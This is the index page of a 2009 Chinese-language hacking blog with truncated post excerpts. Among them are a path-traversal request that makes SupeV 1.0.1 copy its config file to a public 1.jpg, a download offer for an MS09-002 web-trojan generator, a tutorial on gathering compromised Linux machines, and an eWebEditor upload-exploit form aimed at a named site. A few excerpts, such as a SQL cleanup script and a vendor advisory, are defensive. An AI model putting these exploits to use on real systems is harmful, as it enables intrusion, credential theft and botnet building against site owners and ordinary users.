社会工程学|心理学|密码学|逻辑学|逆向思维
10 Aug 2009
28 Feb 2009
无名发布SupeV 1.0.1是discuz旗下产品一款视频播客系统漏洞文件:api目录下test.php漏洞形成,直接以get方式请求 api/test.php?thumb=../config.php&vid=../../1 api/test.php?thumb=../config.php&vid=../../1会把config.php复制到根目录下1.jpg&nb
Read the rest of this entry »27 Feb 2009
前段时间在A5论坛的一个朋友的数据库被批量插了。留着以后用。在查询分析器里打上以下代码DECLARE hCForEach CURSOR GLOBALFORSELECT N'update '+QUOTENAME(o.name) +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.nam
Read the rest of this entry »27 Feb 2009
下面这个是老的。http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/新的pdf 0day 在这里http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.htmlMaybe you read
Read the rest of this entry »24 Feb 2009
最近那个MS09002的漏洞,闹的够火的。现在发个生成器暗组首发的,功能自测!后果自负! 点击下载:MS09002网马生成器
Read the rest of this entry »22 Feb 2009
近日,一项由国外研究人员发现的Adobe Acrobat Reader零日漏洞开始成为黑客攻击的实战目标。据360安全专家石晓虹博士介绍,一些经过精心构造的恶意PDF文档已经在美国等国家的互联网上出现,一旦网民打开这类文档,电脑将自动运行远程控制类Ghost木马,从而成为任由黑客遥控的“肉鸡”。由于微软和Adobe公司尚未发布相关补丁,360安全中心为用户提供了临时解决方案
Read the rest of this entry »16 Feb 2009
适合读者:入侵爱好者、普通Linux网民前置知识:Linux基本操作投向Linux肉鸡的怀抱文/图 密界寻踪 很多菜鸟都在重复的玩3389肉鸡,时间长了自然就腻味了,非常梦想得到自己的Linux肉鸡。今天我就写一篇关于菜鸟如何获得大量Linux肉鸡的方法。需要工具如下:Ssport,下载地址:http://count.skycn.com/s0
Read the rest of this entry »16 Feb 2009
只针对于ASP版本<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H1><br><br><form action="http://www.smxiaoqiang.cn/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye' un
Read the rest of this entry »